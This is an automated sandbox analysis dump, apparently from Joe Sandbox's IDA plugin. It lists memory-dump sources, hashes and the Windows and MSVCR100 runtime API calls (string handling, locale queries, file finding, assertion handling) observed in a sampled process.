                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocalestrcmp
                                                                                                          • String ID: ACP$OCP
                                                                                                          • API String ID: 3191669094-711371036
                                                                                                          • Opcode ID: 6835b55927810968caca52ddca794a0d89a0208b03d4a0bec118bf87fb16163e
                                                                                                          • Instruction ID: b62762e302259bbc93c1875952c98cd7691cb45a28139e151e86fa0131d9a610
                                                                                                          • Opcode Fuzzy Hash: 6835b55927810968caca52ddca794a0d89a0208b03d4a0bec118bf87fb16163e
                                                                                                          • Instruction Fuzzy Hash: 7D012475508706FAFB918F64DC05F9A77F8AF0136DF20016AE412EA081EF30F6418650
                                                                                                          APIs
                                                                                                          • wcsncpy_s.MSVCR100(?,000000FF,?,00000000,?,?,?,?,?,6FD8A184,?,?,?,?,?,?), ref: 6FD8A2D8
                                                                                                          • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6FD8A184,?,?,?,?,?,?), ref: 6FDB126A
                                                                                                          • wcsncpy_s.MSVCR100(?,000000FF,00000000,?,?,?,?,?,?,6FD8A184,?,?,?,?,?,?), ref: 6FDB1293
                                                                                                          • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6FD8A184,?,?,?,?,?,?), ref: 6FDB12B0
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,6FD8A184,?,?,?,?,?,?,?,?,?), ref: 6FDB1319
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,6FD8A184,?,?,?,?,?,?,?,?,?), ref: 6FDB1323
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,6FD8A184,?,?,?,?,?,?,?,?,?), ref: 6FDB1334
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2268458229-0
                                                                                                          • Opcode ID: 87b73b51c518bb9edbcaf6508134a0b64f8a69439c1166a22af99ce3c7bbfd33
                                                                                                          • Instruction ID: 1f4caaf5b25244babac0ba6866773eb91dcbeed94f37479bead1d7738214b8b4
                                                                                                          • Opcode Fuzzy Hash: 87b73b51c518bb9edbcaf6508134a0b64f8a69439c1166a22af99ce3c7bbfd33
                                                                                                          • Instruction Fuzzy Hash: EB71F0B1D04316EA9FA88F6988411DA37A2EF96304B65833FE875D61C0F372B981C791
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6FDFC224
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 6FDFC231
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FDFC239
                                                                                                          • UnhandledExceptionFilter.KERNEL32(6FDFC270), ref: 6FDFC244
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 6FDFC255
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6FDFC260
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 6FDFC267
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3369434319-0
                                                                                                          • Opcode ID: 2fcce1ffa3263b8bcc63eaf103f7aca4863ce131c838cb2e1f9458781a99a370
                                                                                                          • Instruction ID: 6f1d191ce8afc7274a18a7d2c1ae9ee9f50f3b9264ddf24b395d5b1c51e48cc8
                                                                                                          • Opcode Fuzzy Hash: 2fcce1ffa3263b8bcc63eaf103f7aca4863ce131c838cb2e1f9458781a99a370
                                                                                                          • Instruction Fuzzy Hash: 7321E9B480AB548FEB90DF28C185A483FB0BB1B320F10551BE4089A740FFB86AA1CF45
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00D01889
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 00D01896
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D0189E
                                                                                                          • UnhandledExceptionFilter.KERNEL32(00D021E8), ref: 00D018A9
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 00D018BA
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00D018C5
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00D018CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_d00000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3369434319-0
                                                                                                          • Opcode ID: 839d6dbad7e91cc4d6e097375ead5001a8946239edb14f54a88c14e6e4c8f891
                                                                                                          • Instruction ID: 5fabe3a2756d844493a22567d8c4d4fbc28d93ca527b1b6621e23897ff45a676
                                                                                                          • Opcode Fuzzy Hash: 839d6dbad7e91cc4d6e097375ead5001a8946239edb14f54a88c14e6e4c8f891
                                                                                                          • Instruction Fuzzy Hash: 812138B8912304EBE700DF69E9497547BA8FB1C355F50411AE50CC63A1EBB09A85CB7A
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6FDFC224
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 6FDFC231
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FDFC239
                                                                                                          • UnhandledExceptionFilter.KERNEL32(6FDFC270), ref: 6FDFC244
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 6FDFC255
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6FDFC260
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 6FDFC267
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3369434319-0
                                                                                                          • Opcode ID: 53408a5741d1ca3ddee0fa9fe21e78be4c8e8472be1df5a508a9a124c3bf06fa
                                                                                                          • Instruction ID: ecf7174650f75e01469be86dc3551beae5dc4ef0689942a56f348c0c1421733a
                                                                                                          • Opcode Fuzzy Hash: 53408a5741d1ca3ddee0fa9fe21e78be4c8e8472be1df5a508a9a124c3bf06fa
                                                                                                          • Instruction Fuzzy Hash: 3921DBB480AB548FEB90DF28C185A483FB0BB1B324F10551BE50896740FFB86AA5CF45
                                                                                                          APIs
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001,00000001,00000000), ref: 6FDFAE1C
                                                                                                          • memset.MSVCR100(?,00000000,0000004C,00000001,00000000), ref: 6FDFAE34
                                                                                                          • IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 6FDFAEE0
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00000001,00000000), ref: 6FDFAEEA
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,00000001,00000000), ref: 6FDFAEF7
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001,?,00000001,00000000), ref: 6FDFAF0B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled_crt_debugger_hook$DebuggerPresentmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 575713630-0
                                                                                                          • Opcode ID: 131380d71292cbdd1e7ede775406d15c34c7baec596602deb65dd43663c2fca8
                                                                                                          • Instruction ID: 43a7fb16311ee2b6e534974d0fba7991ebc0de85ff498b5ef7b8aa1bfb9dd5f0
                                                                                                          • Opcode Fuzzy Hash: 131380d71292cbdd1e7ede775406d15c34c7baec596602deb65dd43663c2fca8
                                                                                                          • Instruction Fuzzy Hash: 4231E6B4D0132C9BCB65DF24D888BCDB7B8BF08324F1052DAE41DA6290DB346B958F58
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080,?,?,00000000), ref: 6FD8874C
                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 6FD8879E
                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,00000000), ref: 6FD887BC
                                                                                                          • _freea_s.MSVCR100(00000000,?,?,00000000), ref: 6FD887C5
                                                                                                          • malloc.MSVCR100(00000008,?,?,00000000), ref: 6FDB1410
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$ByteCharMultiWide_freea_smalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 221122905-0
                                                                                                          • Opcode ID: 450142434750f94d8edb3a5dde7875d32abf31b5082a47b5b6c88ff026284660
                                                                                                          • Instruction ID: 7365861e799166e7df4216fb361343d9f64e1d1e12ed4da82c84a3c6db913fa4
                                                                                                          • Opcode Fuzzy Hash: 450142434750f94d8edb3a5dde7875d32abf31b5082a47b5b6c88ff026284660
                                                                                                          • Instruction Fuzzy Hash: 4921A171605228BFDF818F65DC8499F7FB9EF4A764B104126F529D6250D730E950CAA0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(76508410,?,?,6FD88466,?,0000000A,00000000), ref: 6FDA78BE
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(76508410,?,?,6FD88466,?,0000000A,00000000), ref: 6FDA78C8
                                                                                                          • _errno.MSVCR100(0000009C,76508410,?,?,6FD88466,?,0000000A,00000000), ref: 6FDA78D4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(0000009C,76508410,?,?,6FD88466,?,0000000A,00000000), ref: 6FDA78DE
                                                                                                          • _errno.MSVCR100(0000009C,76508410,?,?,6FD88466,?,0000000A,00000000), ref: 6FDA78EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          • Opcode ID: f75d5ef8445d8ad6a7a9f1cda04f6debccbbf156b54398d1d2e486a0e230aedc
                                                                                                          • Instruction ID: 3692b9bd5dbbefa406aca7fbe153837088d8a254a8e85fdb8975017803368abd
                                                                                                          • Opcode Fuzzy Hash: f75d5ef8445d8ad6a7a9f1cda04f6debccbbf156b54398d1d2e486a0e230aedc
                                                                                                          • Instruction Fuzzy Hash: 512167751593C6EFD3864F3CC59068D3B559F13B64F1042BFE0A14A282D772B882CBA5
                                                                                                          APIs
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00D01730
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00D0173C
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00D01744
                                                                                                          • GetTickCount.KERNEL32 ref: 00D0174C
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00D01758
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_d00000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 1445889803-0
                                                                                                          • Opcode ID: 9956387d35525eabe02dc8360cc8a869ef8d7680d940a8389aa2fd890d6e0dac
                                                                                                          • Instruction ID: 13d69659c1987e5247c85bdebb0b500a3dbc53e99a66b79d78a5b61840b61cef
                                                                                                          • Opcode Fuzzy Hash: 9956387d35525eabe02dc8360cc8a869ef8d7680d940a8389aa2fd890d6e0dac
                                                                                                          • Instruction Fuzzy Hash: D411827AD01324DBDB20DBB8D84876AB7B8EB48391F550961E909E7354D6709E058BB0
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000354,?,?,6FDCCBA0,?,00000000,-00000002,6FE25BD0), ref: 6FDCCAB5
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                          • FindClose.KERNEL32(?,?,?,6FDCCBA0,?,00000000,-00000002,6FE25BD0), ref: 6FDCCAD2
                                                                                                          • FindFirstFileExW.KERNEL32(-00000002,00000000,00000000,00000000,00000000,?,?,6FDCCBA0,?,00000000,-00000002,6FE25BD0), ref: 6FDCCAEB
                                                                                                          • FindNextFileW.KERNEL32(?,?,6FDCCBA0,?,00000000,-00000002,6FE25BD0), ref: 6FDCCB12
                                                                                                          • FindClose.KERNEL32(?,6FDCCBA0,?,00000000,-00000002,6FE25BD0), ref: 6FDCCB22
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFile$FirstNext_malloc_crtmalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1203757345-0
                                                                                                          • Opcode ID: 520feb6a2df1dafc67930b97f481067e4a9e47cc37dff4b175a382b523b3dc8b
                                                                                                          • Instruction ID: d57e673160107f7a58498c338d614509793b85a9e12ad0ecd28f95545d7f9661
                                                                                                          • Opcode Fuzzy Hash: 520feb6a2df1dafc67930b97f481067e4a9e47cc37dff4b175a382b523b3dc8b
                                                                                                          • Instruction Fuzzy Hash: 9301887100DAB0EFDF518B21EC9888A3EA9FB077B03184516F109CB150EB31B261DB91
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000244,00000000,?,6FDCC887,00000000,00000000,00000001,6FE27C68), ref: 6FDCC78F
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                          • FindClose.KERNEL32(?,00000000,?,6FDCC887,00000000,00000000,00000001,6FE27C68), ref: 6FDCC7AC
                                                                                                          • FindFirstFileExA.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,?,6FDCC887,00000000,00000000,00000001,6FE27C68), ref: 6FDCC7C5
                                                                                                          • FindNextFileA.KERNEL32(00000000,?,6FDCC887,00000000,00000000,00000001,6FE27C68), ref: 6FDCC7EC
                                                                                                          • FindClose.KERNEL32(?,6FDCC887,00000000,00000000,00000001,6FE27C68), ref: 6FDCC7FC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFile$FirstNext_malloc_crtmalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1203757345-0
                                                                                                          • Opcode ID: 103d052e1eb09837263e107b2c089236449b7e20aa7e2230a67b07a2177378ec
                                                                                                          • Instruction ID: de3478cfa4e278150392ea992fc28558c6fb030191a59d89cd0ba9ba03af6094
                                                                                                          • Opcode Fuzzy Hash: 103d052e1eb09837263e107b2c089236449b7e20aa7e2230a67b07a2177378ec
                                                                                                          • Instruction Fuzzy Hash: 5B015A30049A60EFCF915F26CD9884A3FA9FB0B7B0718461BF919CA190EB30B560DB91
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080,?,?,00000000), ref: 6FD8874C
                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 6FD8879E
                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,00000000), ref: 6FD887BC
                                                                                                          • _freea_s.MSVCR100(00000000,?,?,00000000), ref: 6FD887C5
                                                                                                          • malloc.MSVCR100(00000008,?,?,00000000), ref: 6FDB1410
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$ByteCharMultiWide_freea_smalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 221122905-0
                                                                                                          • Opcode ID: 4c82690b2b19fd52c992911682b419dd0720bdcdf04490389e575411c92ceeb2
                                                                                                          • Instruction ID: f9f086daef6b578b517221a214012ce2f6362237183afad7d2203486f1d77890
                                                                                                          • Opcode Fuzzy Hash: 4c82690b2b19fd52c992911682b419dd0720bdcdf04490389e575411c92ceeb2
                                                                                                          • Instruction Fuzzy Hash: CF21C171605229EFDF418F65CC85CDEBFB5EF49674B10422AF825D62A4C731E920CB90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          APIs
                                                                                                          • _set_error_mode.MSVCR100(00000003), ref: 6FDFC473
                                                                                                          • _set_error_mode.MSVCR100(00000003), ref: 6FDFC484
                                                                                                          • strcpy_s.MSVCR100(?,0000021C,Assertion failed!), ref: 6FDFC4AD
                                                                                                          • strcat_s.MSVCR100(?,0000021C), ref: 6FDFC4CB
                                                                                                          • strcat_s.MSVCR100(?,0000021C,Program: ), ref: 6FDFC4E8
                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6FDFC509
                                                                                                          • strcpy_s.MSVCR100(?,00000105,<program name unknown>), ref: 6FDFC524
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFC535
                                                                                                          • strlen.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDFC547
                                                                                                          • strlen.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDFC55C
                                                                                                          • _mbsnbcpy_s.MSVCR100(00000000,?,00000003,?,00000000,00000000,00000000,00000000,00000000), ref: 6FDFC584
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,00000000,00000000,00000000,00000000,00000000), ref: 6FDFC59E
                                                                                                          • strcat_s.MSVCR100(?,0000021C,00000000,00000000,00000000), ref: 6FDFC5B8
                                                                                                          • strcat_s.MSVCR100(?,0000021C,File: ,?,?,?,?,00000000,00000000), ref: 6FDFC5D5
                                                                                                          • strlen.MSVCR100(?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC5E6
                                                                                                          • strlen.MSVCR100(?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC5F9
                                                                                                          • _mbsnbcat_s.MSVCR100(?,0000021C,?,00000011,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC66C
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC68A
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC6AB
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC6C9
                                                                                                          • strcat_s.MSVCR100(?,0000021C,Line: ), ref: 6FDFC6E6
                                                                                                          • strlen.MSVCR100(?,0000000A), ref: 6FDFC6FF
                                                                                                          • strlen.MSVCR100(?,0000021C,0000000A), ref: 6FDFC711
                                                                                                          • _itoa_s.MSVCR100(?,?,0000021C,0000000A), ref: 6FDFC722
                                                                                                          • strcat_s.MSVCR100(?,0000021C), ref: 6FDFC740
                                                                                                          • strcat_s.MSVCR100(?,0000021C,Expression: ), ref: 6FDFC75D
                                                                                                          • strlen.MSVCR100(?), ref: 6FDFC773
                                                                                                          • strlen.MSVCR100(?,?), ref: 6FDFC781
                                                                                                          • strlen.MSVCR100(?), ref: 6FDFC79E
                                                                                                          • _mbsnbcat_s.MSVCR100(?,0000021C,?,00000169,?), ref: 6FDFC7B9
                                                                                                          • strcat_s.MSVCR100(?,0000021C), ref: 6FDFC7D7
                                                                                                          • strcat_s.MSVCR100(?,0000021C), ref: 6FDFC7F5
                                                                                                          • strcat_s.MSVCR100(?,0000021C,For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts), ref: 6FDFC812
                                                                                                          • strcat_s.MSVCR100(?,0000021C), ref: 6FDFC830
                                                                                                          • strcat_s.MSVCR100(?,0000021C,(Press Retry to debug the application - JIT must be enabled)), ref: 6FDFC84D
                                                                                                          • raise.MSVCR100(00000016), ref: 6FDFC881
                                                                                                          • _exit.MSVCR100(00000003), ref: 6FDFC889
                                                                                                          • _mbsnbcat_s.MSVCR100(?,0000021C,00000000,00000001,00000003), ref: 6FDFC8AC
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,00000003), ref: 6FDFC8CA
                                                                                                          • _mbsnbcat_s.MSVCR100(?,0000021C,00000000,00000020,00000003), ref: 6FDFC8F7
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,00000003), ref: 6FDFC915
                                                                                                          • _mbsnbcat_s.MSVCR100(?,0000021C,?,00000007,?,?,?,?,?,?,00000003), ref: 6FDFC938
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,?,?,?,?,?,?,?,00000003), ref: 6FDFC956
                                                                                                          • __p__iob.MSVCR100 ref: 6FDFC996
                                                                                                          • __p__iob.MSVCR100(00000000,00000004,00000000), ref: 6FDFC9AA
                                                                                                          • setvbuf.MSVCR100(-00000040,00000000,00000004,00000000), ref: 6FDFC9B3
                                                                                                          • __p__iob.MSVCR100(Assertion failed: %s, file %s, line %d,?,?,?), ref: 6FDFC9C5
                                                                                                          • fprintf.MSVCR100(-00000040,Assertion failed: %s, file %s, line %d,?,?,?), ref: 6FDFC9CE
                                                                                                          • __p__iob.MSVCR100(-00000040,Assertion failed: %s, file %s, line %d,?,?,?), ref: 6FDFC9D3
                                                                                                          • fflush.MSVCR100(-00000040,-00000040,Assertion failed: %s, file %s, line %d,?,?,?), ref: 6FDFC9DC
                                                                                                          • abort.MSVCR100 ref: 6FDFC9E4
                                                                                                          Strings
